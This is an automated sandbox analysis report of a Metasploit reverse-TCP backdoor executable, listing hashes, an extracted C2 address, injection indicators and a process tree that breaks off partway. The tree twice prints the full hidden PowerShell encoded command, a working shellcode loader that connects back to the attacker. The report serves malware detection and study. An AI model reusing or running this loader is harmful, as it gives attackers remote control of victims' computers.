metasploit | 9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622

General

Target

9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622.exe
Size

17KB
MD5

5485359ac4238d5954efe0905be1b666
SHA1

adf8028922e6cff8bb53341135d71537f72740ea
SHA256

9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622
SHA512

fc183cac0e50a01a94ed07aef297debd8fd206108ad7d35e7fd1b052d9a267062466e68a22a49464fd15ec819faa7fc0f1a82b34d2a6332f147b4a214ca22968
SSDEEP

384:zEEoLO56ayzcMj+u+XvueaWwjuYgSwDpwmc6MnfTtHF0:gE8O56lcVu+X0aYgSwDrcZfTNa

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.1.8:8080

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2552	powershell.exe
3040	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	3040	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1224 wrote to memory of 1668	1224	9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622.exe	28
PID 1224 wrote to memory of 1668	1224	9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622.exe	28
PID 1224 wrote to memory of 1668	1224	9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622.exe	28
PID 1668 wrote to memory of 2552	1668	cmd.exe	29
PID 1668 wrote to memory of 2552	1668	cmd.exe	29
PID 1668 wrote to memory of 2552	1668	cmd.exe	29
PID 2552 wrote to memory of 3040	2552	powershell.exe	30
PID 2552 wrote to memory of 3040	2552	powershell.exe	30
PID 2552 wrote to memory of 3040	2552	powershell.exe	30
PID 2552 wrote to memory of 3040	2552	powershell.exe	30
PID 3040 wrote to memory of 2656	3040	powershell.exe	31
PID 3040 wrote to memory of 2656	3040	powershell.exe	31
PID 3040 wrote to memory of 2656	3040	powershell.exe	31
PID 3040 wrote to memory of 2656	3040	powershell.exe	31
PID 2656 wrote to memory of 2464	2656	csc.exe	32
PID 2656 wrote to memory of 2464	2656	csc.exe	32
PID 2656 wrote to memory of 2464	2656	csc.exe	32
PID 2656 wrote to memory of 2464	2656	csc.exe	32

C:\Users\Admin\AppData\Local\Temp\9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622.exe
"C:\Users\Admin\AppData\Local\Temp\9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAA3AHkAVwB4ACAAPQAgACcAJABNAGcAUwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABNAGcAUwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAOQA3ACwAMAB4ADYAMgAsADAAeAAyADgALAAwAHgAYwA1ACwAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADcAMAAsADAAeAAxADIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMAAzACwAMAB4AGUANwAsADAAeAA2AGMALAAwAHgAYwBhACwAMAB4ADMAMAAsADAAeABmAGIALAAwAHgAOQA5ACwAMAB4ADgANQAsADAAeABiAGIALAAwAHgAMAAzACwAMAB4ADUAYQAsADAAeABmAGEALAAwAHgAOABhACwAMAB4AGQAMQAsADAAeAAzAGUALAAwAHgANwAxACwAMAB4AGIAZQAsADAAeABlADUALAAwAHgAMwA3ACwAMAB4ADYAMAAsADAAeABiADQALAAwAHgANQA3ACwAMAB4ADQANAAsADAAeABlADAALAAwAHgAOQA5ACwAMAB4ADQAMwAsADAAeAA2ADUALAAwAHgAMAA5ACwAMAB4ADkANgAsADAAeAAxADkALAAwAHgAYQBkACwAMAB4AGYAYQAsADAAeAAxAGUALAAwAHgAOQA3ACwAMAB4ADgAYgAsADAAeAAzADUALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeABlADgALAAwAHgANQA0ACwAMAB4ADUAZAAsADAAeABkADEALAAwAHgAMwBjACwAMAB4AGIANwAsADAAeAA1AGMALAAwAHgAMQBhACwAMAB4ADMAMQAsADAAeABiADYALAAwAHgAOQA5ACwAMAB4AGUAZAAsADAAeAAzAGYALAAwAHgANQA3ACwAMAB4ADcANwAsADAAeAA2ADYALAAwAHgAZQBkACwAMAB4AGIANwAsADAAeABmADMALAAwAHgAMwBhACwAMAB4ADIAZQAsADAAeABlAGYALAAwAHgAMAAyACwAMAB4ADYAYQAsADAAeABjADUALAAwAHgANABmACwAMAB4ADcAZAAsADAAeAAwAGYALAAwAHgAMQBhACwAMAB4ADMAYgAsADAAeAAzADEALAAwAHgAMABlACwAMAB4ADQAYgAsADAAeAA5ADQALAAwAHgANAAyACwAMAB4ADQAOAAsADAAeAA0AGIALAAwAHgAMQA0ACwAMAB4ADgANgAsADAAeABlADMALAAwAHgAYwAzACwAMAB4ADAAZQAsADAAeABhAGQALAAwAHgAMwBhACwAMAB4AGEANwAsADAAeAAxADIALAAwAHgAOQBjACwAMAB4ADQAMwAsADAAeAAwADEALAAwAHgAZQAwACwAMAB4AGUAYQAsADAAeAAzADAALAAwAHgAOQAzACwAMAB4ADIAMAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUANQAsADAAeAAwADMALAAwAHgANAA5ACwAMAB4AGEAYQAsADAAeAA1ADcALAAwAHgANQBiACwAMAB4ADYAYQAsADAAeAA1ADIALAAwAHgAMgAyACwAMAB4ADkANwAsADAAeAA4ADgALAAwAHgAZQBmACwAMAB4ADMANQAsADAAeAA2AGMALAAwAHgAZgAyACwAMAB4ADIAYgAsADAAeABiADMALAAwAHgANwAzACwAMAB4ADUANAAsADAAeABiADgALAAwAHgANgAzACwAMAB4ADUAMAAsADAAeAA2ADQALAAwAHgANgBkACwAMAB4AGYANQAsADAAeAAxADMALAAwAHgANgBhACwAMAB4AGQAYQAsADAAeAA3ADEALAAwAHgANwBiACwAMAB4ADYAZgAsADAAeABkAGQALAAwAHgANQA2ACwAMAB4AGYANwAsADAAeAA4AGIALAAwAHgANQA2ACwAMAB4ADUAOQAsADAAeABkADgALAAwAHgAMQBkACwAMAB4ADIAYwAsADAAeAA3AGUALAAwAHgAZgBjACwAMAB4ADQANgAsADAAeABmADcALAAwAHgAMQBmACwAMAB4AGEANQAsADAAeAAyADIALAAwAHgANQA2ACwAMAB4ADEAZgAsADAAeABiADUALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAA4ADUALAAwAHgAYgBkACwAMAB4ADMAZQAsADAAeAA1AGUALAAwAHgAYgA5ACwAMAB4ADMAZAAsADAAeABjADEALAAwAHgANQBmACwAMAB4AGUANwAsADAAeABhADkALAAwAHgAMABkACwAMAB4AGEAZAAsADAAeAAxADgALAAwAHgAMgBhACwAMAB4ADEAYQAsADAAeABhADYALAAwAHgANgBiACwAMAB4ADEAOAAsADAAeAA4ADUALAAwAHgAMQBjACwAMAB4AGUANAAsADAAeAAxADAALAAwAHgANABlACwAMAB4AGIAYQAsADAAeABmADMALAAwAHgAMgAxACwAMAB4ADUAOAAsADAAeAAzAGQALAAwAHgAMgBiACwAMAB4ADgAOQAsADAAeAAwADkALAAwAHgAYwAwACwAMAB4AGMAYwAsADAAeABlAGEALAAwAHgAMAAwACwAMAB4ADAANgAsADAAeAA5ADgALAAwAHgAYgBhACwAMAB4ADMAYQAsADAAeABhAGYALAAwAHgAYQAxACwAMAB4ADUAMAAsADAAeABiAGIALAAwAHgANQAwACwAMAB4ADcANAAsADAAeABjAGMALAAwAHgAYgAxACwAMAB4AGMANgAsADAAeABiADcALAAwAHgAYgA5ACwAMAB4AGMANwAsADAAeAAxAGUALAAwAHgANQAwACwAMAB4AGIAOAAsADAAeABjADcALAAwAHgAMAAxACwAMAB4ADMAMAAsADAAeAAzADUALAAwAHgAMgAxACwAMAB4ADYAZAAsADAAeAA2ADAALAAwAHgAMQA2ACwAMAB4AGYAZQAsADAAeABjAGQALAAwAHgAZAAwACwAMAB4AGQANgAsADAAeABhAGUALAAwAHgAYQA1ACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAOQAxACwAMAB4AGQANQAsADAAeAA0ADQALAAwAHgAMwAzACwAMAB4AGIAYQAsADAAeAA3AGYALAAwAHgAYQBiACwAMAB4AGUAYQAsADAAeAA5ADIALAAwAHgAMQA3ACwAMAB4ADUAMgAsADAAeABiADcALAAwAHgANgA5ACwAMAB4ADgANgAsADAAeAA5AGIALAAwAHgANgBkACwAMAB4ADEANAAsADAAeAA4ADgALAAwAHgAMQAwACwAMAB4ADgAMgAsADAAeABlADgALAAwAHgANAA2ACwAMAB4AGQAMQAsADAAeABlAGYALAAwAHgAZgBhACwAMAB4ADMAZQAsADAAeAAxADEALAAwAHgAYgBhACwAMAB4AGEAMQAsADAAeABlADgALAAwAHgAMgBlACwAMAB4ADEAMAAsADAAeABjAGYALAAwAHgAMQA0ACwAMAB4AGIAYgAsADAAeAA5AGYALAAwAHgANAA2ACwAMAB4ADQAMwAsADAAeAA1ADMALAAwAHgAYQAyACwAMAB4AGIAZgAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADUAZAAsADAAeABlAGEALAAwAHgAYgA4ACwAMAB4ADMANQAsADAAeABjADgALAAwAHgANQA1ACwAMAB4AGQANgAsADAAeAAzADkALAAwAHgAMQBjACwAMAB4ADUANgAsADAAeAAyADYALAAwAHgANgBjACwAMAB4ADcANgAsADAAeAA1ADYALAAwAHgANABlACwAMAB4AGMAOAAsADAAeAAyADIALAAwAHgAMAA1ACwAMAB4ADYAYgAsADAAeAAxADcALAAwAHgAZgBmACwAMAB4ADMAOQAsADAAeAAyADAALAAwAHgAOAAyACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAOQA1ACwAMAB4ADAANQAsADAAeAA2ADkALAAwAHgAOQA2ACwAMAB4AGMAMAAsADAAeAA2ADIALAAwAHgAMwA2ACwAMAB4ADYAOQAsADAAeAAyADcALAAwAHgANwAzACwAMAB4ADAAYQAsADAAeABiAGMALAAwAHgAMAAxACwAMAB4ADAAMQAsADAAeAA2ADIALAAwAHgANwBjADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABBAEIAVAB1AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABBAEIAVAB1AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABBAEIAVAB1ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQANwB5AFcAeAApACkAOwAkAGMARgBTACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQwBnAFYAegAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABDAGcAVgB6ACAAJABjAEYAUwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABjAEYAUwAgACQAZQAiADsAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JAA3AHkAVwB4ACAAPQAgACcAJABNAGcAUwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABNAGcAUwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAOQA3ACwAMAB4ADYAMgAsADAAeAAyADgALAAwAHgAYwA1ACwAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADcAMAAsADAAeAAxADIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMAAzACwAMAB4AGUANwAsADAAeAA2AGMALAAwAHgAYwBhACwAMAB4ADMAMAAsADAAeABmAGIALAAwAHgAOQA5ACwAMAB4ADgANQAsADAAeABiAGIALAAwAHgAMAAzACwAMAB4ADUAYQAsADAAeABmAGEALAAwAHgAOABhACwAMAB4AGQAMQAsADAAeAAzAGUALAAwAHgANwAxACwAMAB4AGIAZQAsADAAeABlADUALAAwAHgAMwA3ACwAMAB4ADYAMAAsADAAeABiADQALAAwAHgANQA3ACwAMAB4ADQANAAsADAAeABlADAALAAwAHgAOQA5ACwAMAB4ADQAMwAsADAAeAA2ADUALAAwAHgAMAA5ACwAMAB4ADkANgAsADAAeAAxADkALAAwAHgAYQBkACwAMAB4AGYAYQAsADAAeAAxAGUALAAwAHgAOQA3ACwAMAB4ADgAYgAsADAAeAAzADUALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeABlADgALAAwAHgANQA0ACwAMAB4ADUAZAAsADAAeABkADEALAAwAHgAMwBjACwAMAB4AGIANwAsADAAeAA1AGMALAAwAHgAMQBhACwAMAB4ADMAMQAsADAAeABiADYALAAwAHgAOQA5ACwAMAB4AGUAZAAsADAAeAAzAGYALAAwAHgANQA3ACwAMAB4ADcANwAsADAAeAA2ADYALAAwAHgAZQBkACwAMAB4AGIANwAsADAAeABmADMALAAwAHgAMwBhACwAMAB4ADIAZQAsADAAeABlAGYALAAwAHgAMAAyACwAMAB4ADYAYQAsADAAeABjADUALAAwAHgANABmACwAMAB4ADcAZAAsADAAeAAwAGYALAAwAHgAMQBhACwAMAB4ADMAYgAsADAAeAAzADEALAAwAHgAMABlACwAMAB4ADQAYgAsADAAeAA5ADQALAAwAHgANAAyACwAMAB4ADQAOAAsADAAeAA0AGIALAAwAHgAMQA0ACwAMAB4ADgANgAsADAAeABlADMALAAwAHgAYwAzACwAMAB4ADAAZQAsADAAeABhAGQALAAwAHgAMwBhACwAMAB4AGEANwAsADAAeAAxADIALAAwAHgAOQBjACwAMAB4ADQAMwAsADAAeAAwADEALAAwAHgAZQAwACwAMAB4AGUAYQAsADAAeAAzADAALAAwAHgAOQAzACwAMAB4ADIAMAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUANQAsADAAeAAwADMALAAwAHgANAA5ACwAMAB4AGEAYQAsADAAeAA1ADcALAAwAHgANQBiACwAMAB4ADYAYQAsADAAeAA1ADIALAAwAHgAMgAyACwAMAB4ADkANwAsADAAeAA4ADgALAAwAHgAZQBmACwAMAB4ADMANQAsADAAeAA2AGMALAAwAHgAZgAyACwAMAB4ADIAYgAsADAAeABiADMALAAwAHgANwAzACwAMAB4ADUANAAsADAAeABiADgALAAwAHgANgAzACwAMAB4ADUAMAAsADAAeAA2ADQALAAwAHgANgBkACwAMAB4AGYANQAsADAAeAAxADMALAAwAHgANgBhACwAMAB4AGQAYQAsADAAeAA3ADEALAAwAHgANwBiACwAMAB4ADYAZgAsADAAeABkAGQALAAwAHgANQA2ACwAMAB4AGYANwAsADAAeAA4AGIALAAwAHgANQA2ACwAMAB4ADUAOQAsADAAeABkADgALAAwAHgAMQBkACwAMAB4ADIAYwAsADAAeAA3AGUALAAwAHgAZgBjACwAMAB4ADQANgAsADAAeABmADcALAAwAHgAMQBmACwAMAB4AGEANQAsADAAeAAyADIALAAwAHgANQA2ACwAMAB4ADEAZgAsADAAeABiADUALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAA4ADUALAAwAHgAYgBkACwAMAB4ADMAZQAsADAAeAA1AGUALAAwAHgAYgA5ACwAMAB4ADMAZAAsADAAeABjADEALAAwAHgANQBmACwAMAB4AGUANwAsADAAeABhADkALAAwAHgAMABkACwAMAB4AGEAZAAsADAAeAAxADgALAAwAHgAMgBhACwAMAB4ADEAYQAsADAAeABhADYALAAwAHgANgBiACwAMAB4ADEAOAAsADAAeAA4ADUALAAwAHgAMQBjACwAMAB4AGUANAAsADAAeAAxADAALAAwAHgANABlACwAMAB4AGIAYQAsADAAeABmADMALAAwAHgAMgAxACwAMAB4ADUAOAAsADAAeAAzAGQALAAwAHgAMgBiACwAMAB4ADgAOQAsADAAeAAwADkALAAwAHgAYwAwACwAMAB4AGMAYwAsADAAeABlAGEALAAwAHgAMAAwACwAMAB4ADAANgAsADAAeAA5ADgALAAwAHgAYgBhACwAMAB4ADMAYQAsADAAeABhAGYALAAwAHgAYQAxACwAMAB4ADUAMAAsADAAeABiAGIALAAwAHgANQAwACwAMAB4ADcANAAsADAAeABjAGMALAAwAHgAYgAxACwAMAB4AGMANgAsADAAeABiADcALAAwAHgAYgA5ACwAMAB4AGMANwAsADAAeAAxAGUALAAwAHgANQAwACwAMAB4AGIAOAAsADAAeABjADcALAAwAHgAMAAxACwAMAB4ADMAMAAsADAAeAAzADUALAAwAHgAMgAxACwAMAB4ADYAZAAsADAAeAA2ADAALAAwAHgAMQA2ACwAMAB4AGYAZQAsADAAeABjAGQALAAwAHgAZAAwACwAMAB4AGQANgAsADAAeABhAGUALAAwAHgAYQA1ACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAOQAxACwAMAB4AGQANQAsADAAeAA0ADQALAAwAHgAMwAzACwAMAB4AGIAYQAsADAAeAA3AGYALAAwAHgAYQBiACwAMAB4AGUAYQAsADAAeAA5ADIALAAwAHgAMQA3ACwAMAB4ADUAMgAsADAAeABiADcALAAwAHgANgA5ACwAMAB4ADgANgAsADAAeAA5AGIALAAwAHgANgBkACwAMAB4ADEANAAsADAAeAA4ADgALAAwAHgAMQAwACwAMAB4ADgAMgAsADAAeABlADgALAAwAHgANAA2ACwAMAB4AGQAMQAsADAAeABlAGYALAAwAHgAZgBhACwAMAB4ADMAZQAsADAAeAAxADEALAAwAHgAYgBhACwAMAB4AGEAMQAsADAAeABlADgALAAwAHgAMgBlACwAMAB4ADEAMAAsADAAeABjAGYALAAwAHgAMQA0ACwAMAB4AGIAYgAsADAAeAA5AGYALAAwAHgANAA2ACwAMAB4ADQAMwAsADAAeAA1ADMALAAwAHgAYQAyACwAMAB4AGIAZgAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADUAZAAsADAAeABlAGEALAAwAHgAYgA4ACwAMAB4ADMANQAsADAAeABjADgALAAwAHgANQA1ACwAMAB4AGQANgAsADAAeAAzADkALAAwAHgAMQBjACwAMAB4ADUANgAsADAAeAAyADYALAAwAHgANgBjACwAMAB4ADcANgAsADAAeAA1ADYALAAwAHgANABlACwAMAB4AGMAOAAsADAAeAAyADIALAAwAHgAMAA1ACwAMAB4ADYAYgAsADAAeAAxADcALAAwAHgAZgBmACwAMAB4ADMAOQAsADAAeAAyADAALAAwAHgAOAAyACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAOQA1ACwAMAB4ADAANQAsADAAeAA2ADkALAAwAHgAOQA2ACwAMAB4AGMAMAAsADAAeAA2ADIALAAwAHgAMwA2ACwAMAB4ADYAOQAsADAAeAAyADcALAAwAHgANwAzACwAMAB4ADAAYQAsADAAeABiAGMALAAwAHgAMAAxACwAMAB4ADAAMQAsADAAeAA2ADIALAAwAHgANwBjADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABBAEIAVAB1AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABBAEIAVAB1AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABBAEIAVAB1ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQANwB5AFcAeAApACkAOwAkAGMARgBTACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQwBnAFYAegAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABDAGcAVgB6ACAAJABjAEYAUwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABjAEYAUwAgACQAZQAiADsAfQA=
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2552
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
